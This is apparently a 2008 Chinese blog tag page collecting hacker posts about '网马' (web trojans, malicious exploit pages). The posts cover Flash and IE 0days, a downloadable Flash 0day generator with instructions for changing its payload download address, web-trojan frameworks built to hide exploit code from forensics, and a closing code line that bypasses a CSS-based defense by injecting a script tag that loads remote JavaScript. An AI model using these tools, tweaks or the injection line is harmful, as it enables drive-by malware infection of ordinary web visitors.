标签 ‘网马’ 下的日志

FLASH 0DAY 详细分析和总结

作者:racle
来源:天阳网络技术论坛

手记:
——————————————
首先必须感谢的X.G.C.Team的OPEN在几个关键的地方给予我分析,解决办法的帮助.与及咱们论坛好几位兄弟的帮助.最终我才把这个东西给分析出来..
——————————————
最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力..
阅读全文 »

Tags: , , ,

关于FLASH ODAY的修改方法

鬼仔注:昨天发了open写的Flash 0day生成器,当时忘了说了,是在赏月那里看到的。结果今天open跟我说发出来之后,好多人找他问修改方法,所以就有了现在这篇文章。

来源:open’s blog

鬼仔网站上公布了生成器。在这我就粗略说一下
把那个ODAY的网址改为明文的方法。
以我BLOG所上传的样本为例:
定位到文件的FD位置后。把它改为51
之后的下载网址你想改啥就啥
阅读全文 »

Tags: , , ,

Flash 0day生成器

鬼仔:也就是这个了,open写的。

下载地址:flash0day.rar

Tags: , , , ,

FLASH网马悄然现身互联网

鬼仔注:据说是Flash Player ActiveX 9.0.115以下版本。

来源:知道安全
发布日期:2008-5-26
最后更新日期:2008-5-26   17:37(GMT)

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
阅读全文 »

Tags: ,

IE0DAY网马

鬼仔注:这个漏洞

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign
2008-5-24
http://www.scanw.com/blog

哈哈。标题吸引吗。
修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。
阅读全文 »

Tags:

网马躯干

鬼仔注:网马中枢

Author: Greysign
2008-5-23
http://www.scanw.com/blog

余弦不久之前写了网马中枢,是关于服务端应用的一小角,他还说有其他更复杂的应用,一直等着他的BLOG更新,还是未见他写出来。最近大家都很忙。

关于网马代码,exploit固然重要,但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ,读取文件等方式来隐藏EXP的地址,不过,EXP代码完全暴露出来了,那就无法阻止代码被剽窃,被取证等行为。
阅读全文 »

Tags:

网马中枢

作者:余弦
来源:0x37 Security

其实想想就会知道,网马的exp总会有暴露的时刻,也就是说,我的系统环境只要满足条件就可以获得这个网马的exp。通过结合服务端的技术手段,我们可以隐藏网马exp的地址,但是却无法保证这个exp不暴露出来,exp终究要在你的浏览器上执行恶意行为。
阅读全文 »

Tags:

关于<<二行代码解决全部网页木马>>的文章

鬼仔注:前两天发过 <<二行代码解决全部网页木马>>

作者:lcx
来源:vbs小铺

原文在这:http://www.blueidea.com/tech/web/2008/5575.asp

主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会

突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。

代码:
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>

Tags: ,